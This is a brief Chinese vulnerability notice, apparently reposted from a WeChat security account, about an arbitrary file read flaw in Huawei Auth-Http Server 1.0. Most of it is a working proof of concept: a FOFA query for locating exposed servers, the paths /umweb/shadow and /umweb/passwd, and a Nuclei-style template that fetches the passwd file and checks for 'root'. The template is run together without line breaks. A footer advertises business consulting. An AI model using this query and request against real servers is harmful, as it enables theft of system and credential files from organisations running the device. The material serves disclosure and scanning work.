漏洞描述:
Huawei Auth-Http任意文件泄露漏洞,攻击者可构造恶意请求获取系统信息等及其它安全风险。
FOFA:
server="Huawei Auth-Http Server 1.0"POC:来源于互联网
/umweb/shadowid: huanwei-auth-http-server-filereadinfo:name: 华为Auth-Http Server 1.0任意文件读取author:severity: mediumdescription: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。reference:- https://metadata:fofa-query: server="Huawei Auth-Http Server 1.0"verified: truemax-request: 1http:- raw:- |GET /umweb/passwd HTTP/1.1Host: {{Hostname}}matchers:- type: dsldsl:- 'status_code==200 && contains_all(body,"root")'
欢迎添加微信进行业务咨询:
承接以下业务:
文章来源: http://mp.weixin.qq.com/s?__biz=MzI1MDk3NDc5Mg==&mid=2247485130&idx=1&sn=8d0ec4f00a8f57bce5770816f1b394c3&chksm=e9fb41edde8cc8fb6767b2ca86af573f69bd99c2c7634c3f3b03d573cd2df8c28d0715e8f9d4&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh